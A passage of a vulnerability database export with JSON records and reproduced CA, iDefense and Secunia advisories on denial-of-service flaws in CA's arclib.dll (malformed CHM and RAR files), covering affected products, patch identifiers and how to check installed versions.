"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9362"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9362"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-09T17:00:09.303000",
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "McAfee AntiVirus zip Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
}
}
VAR-200707-0263
Vulnerability from variot - Updated: 2023-12-18 12:23arclib.dll before 7.3.0.9 in CA Anti-Virus (formerly eTrust Antivirus) 8 and certain other CA products allows remote attackers to cause a denial of service (infinite loop and loss of antivirus functionality) via an invalid "previous listing chunk number" field in a CHM file. Multiple Computer Associates products are prone to a denial-of-service vulnerability because the applications fail to handle malformed CHM files. Successfully exploiting this issue will cause the affected applications to stop responding, denying service to legitimate users. This issue affects applications that use the 'arclib.dll' library versions prior to 7.3.0.9. The Arclib.DLL library in eTrust products has a security vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities
CA Vuln ID (CAID): 35525, 35526
CA Advisory Date: 2007-07-24
Reported By: CVE-2006-5645 - Titon of BastardLabs and Damian Put working with the iDefense VCP. CVE-2007-3875 - An anonymous researcher working with the iDefense VCP. Sergio Alvarez of n.runs AG also reported these issues.
Impact: A remote attacker can cause a denial of service.
Summary: CA products that utilize the Arclib library contain two denial of service vulnerabilities. The second vulnerability, CVE-2006-5645, is due to an application hang when processing a specially malformed RAR file.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating.
Affected Products: CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.0, 7.1, r8, r8.1 CA Anti-Virus 2007 (v8) eTrust EZ Antivirus r7, r6.1 CA Internet Security Suite 2007 (v3) eTrust Internet Security Suite r1, r2 eTrust EZ Armor r1, r2, r3.x CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus Gateway) 7.1 CA Protection Suites r2, r3 CA Secure Content Manager (formerly eTrust Secure Content Manager) 1.1, 8.0 CA Anti-Spyware for the Enterprise (Formerly eTrust PestPatrol) r8, 8.1 CA Anti-Spyware 2007 Unicenter Network and Systems Management (NSM) r3.0, r3.1, r11, r11.1 BrightStor ARCserve Backup v9.01, r11 for Windows, r11.1, r11.5 BrightStor Enterprise Backup r10.5 BrightStor ARCserve Client agent for Windows eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1 CA Common Services (CCS) r11, r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)
Status and Recommendation: CA has provided an update to address the vulnerabilities. The updated Arclib library is provided in automatic content updates with most products. Ensure that the latest content update is installed. In the case where automatic updates are not available, use the following product specific instructions.
CA Secure Content Manager 1.1: Apply QO89469.
CA Secure Content Manager 8.0: Apply QO87114.
Unicenter Network and Systems Management (NSM) r3.0: Apply QO89141.
Unicenter Network and Systems Management (NSM) r3.1: Apply QO89139.
Unicenter Network and Systems Management (NSM) r11: Apply QO89140.
Unicenter Network and Systems Management (NSM) r11.1: Apply QO89138.
CA Common Services (CCS) r11: Apply QO89140.
CA Common Services (CCS) r11.1: Apply QO89138.
CA Anti-Virus Gateway 7.1: Apply QO89381.
eTrust Intrusion Detection 2.0 SP1: Apply QO89474.
eTrust Intrusion Detection 3.0: Apply QO86925.
eTrust Intrusion Detection 3.0 SP1: Apply QO86923.
CA Protection Suites r2: Apply updates for CA Anti-Virus 7.1.
BrightStor ARCserve Backup and BrightStor ARCserve Client agent for Windows:
Manually replace the arclib.dll file with the one provided in the CA Anti-Virus 7.1 fix set.
- Locate and rename the existing arclib.dll file.
- Download the CA Anti-Virus 7.1 patch that matches the host operating system.
- Unpack the patch and place the arclib.dll file in directory where the existing arclib.dll file was found in step 1.
- Reboot the host.
CA Anti-Virus 7.1 (non Windows):
T229327 – Solaris – QO86831 T229328 – Netware – QO86832 T229329 – MacPPC – QO86833 T229330 – MacIntel – QO86834 T229331 – Linux390 – QO86835 T229332 – Linux – QO86836 T229333 – HP-UX – QO86837
CA Anti-Virus 7.1 (Windows):
T229337 – NT (32 bit) – QO86843 T229338 – NT (AMD64) – QO86846
CA Threat Manager for the Enterprise r8.1 (non Windows):
T229334 – Linux – QO86839 T229335 – Mac – QO86828 T229336 – Solaris – QO86829
How to determine if you are affected: For products on Windows: 1. Using Windows Explorer, locate the file “arclib.dll”. By default, the file is located in the “C:\Program Files\CA\SharedComponents\ScanEngine” directory(*). 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is earlier than indicated in the table below, the installation is vulnerable.
File Name File Version arclib.dll 7.3.0.9
*For eTrust Intrusion Detection 2.0 the file is located in “Program Files\eTrust\Intrusion Detection\Common”, and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in “Program Files\CA\Intrusion Detection\Common”.
For CA Anti-Virus r8.1 on non-Windows: Use the compver utility provided on the CD to determine the version of arclib.dll. The same version information above applies.
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ Security Notice for CA Products Containing Arclib http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot .asp Solution Document Reference APARs: QO89469, QO87114, QO89141, QO89139, QO89140, QO89138, QO89140, QO89138, QO89381, QO89474, QO86925, QO86923, QO86831, QO86832, QO86833, QO86834, QO86835, QO86836, QO86837, QO86843, QO86846, QO86839, QO86828, QO86829 CA Security Advisor posting: CA Products Arclib Library Denial of Service Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149847 CA Vuln ID (CAID): 35525, 35526 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35525 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35526 Reported By: CVE-2006-5645 - Titon of BastardLabs and Damian Put working with the iDefense VCP. CVE-2007-3875 - An anonymous researcher working with the iDefense VCP. Sergio Alvarez of n.runs AG also reported these issues. iDefense advisories: Computer Associates AntiVirus CHM File Handling DoS Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567 Multiple Vendor Antivirus RAR File Denial of Service Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=439 CVE References: CVE-2006-5645, CVE-2007-3875 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5645 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3875 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFGpp9beSWR3+KUGYURAplHAJ4paEd/cX+2AxdBWfnw2zhfjAGQwACfW+mo tCqbonQi4DvtQ9a45c65y70= =o8Ac -----END PGP SIGNATURE----- . BACKGROUND
eTrust is an antivirus application developed by Computer Associates. More information can be found on the vendor's website at the following URL.
http://www3.ca.com/solutions/product.aspx?ID=156
II. DESCRIPTION
Remote exploitation of a denial of Service (DoS) vulnerability in Computer Associates Inc.'s eTrust Antivirus products could allow attackers to create a DoS condition on the affected computer.
III. ANALYSIS
This denial of service attack will prevent the scanner from scanning other files on disk while it is stuck on the exploit file. The hung process can be quit by the user and does not consume all system resources.
IV. DETECTION
iDefense has confirmed this vulnerability in eTrust AntiVirus version r8. Previous versions of eTrust Antivirus are suspected vulnerable. Other Computer Associates products, as well as derived products, may also be vulnerable.
V. WORKAROUND
iDefense is not aware of any workarounds for this issue.
VI. VENDOR RESPONSE
Computer Associates has addressed this vulnerability by releasing updates. More information is available within Computer Associates advisory at the following URL.
http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3875 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
01/16/2007 Initial vendor notification 01/17/2007 Initial vendor response 07/24/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. scanning a specially crafted RAR archive. Please see the vendor's advisory for details. 2) The vendor credits Titon of BastardLabs and Damian Put, reported via iDefense Labs.
ORIGINAL ADVISORY: CA: http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp
iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200707-0263",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.4,
"vendor": "ca",
"version": "8"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r2"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "etrust internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "etrust internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "anti virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3"
},
{
"model": "antivirus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "brightstor enterprise backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.5"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "antispyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "brightstor arcserve client",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "antispyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "anti-virus for the enterprise",
"scope": "lte",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "brigthstor arcserve client for windows",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "9.01"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "brightstor arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brightstor arcserve client",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brightstor enterprise backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brigthstor arcserve client for windows",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-spyware for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "anti-virus sdk",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "etrust internet security suite",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "unicenter network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2007"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates etrust internet security suite r1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"model": "associates anti-spyware for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-spyware",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates anti-spyware for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust antivirus r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust antivirus r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates anti-virus for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates arcserve client agent for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust internet security suite r2",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
}
],
"sources": [
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:brightstor_arcserve_backup:11:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:9.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_intrusion_detection:3.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_internet_security_suite:2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
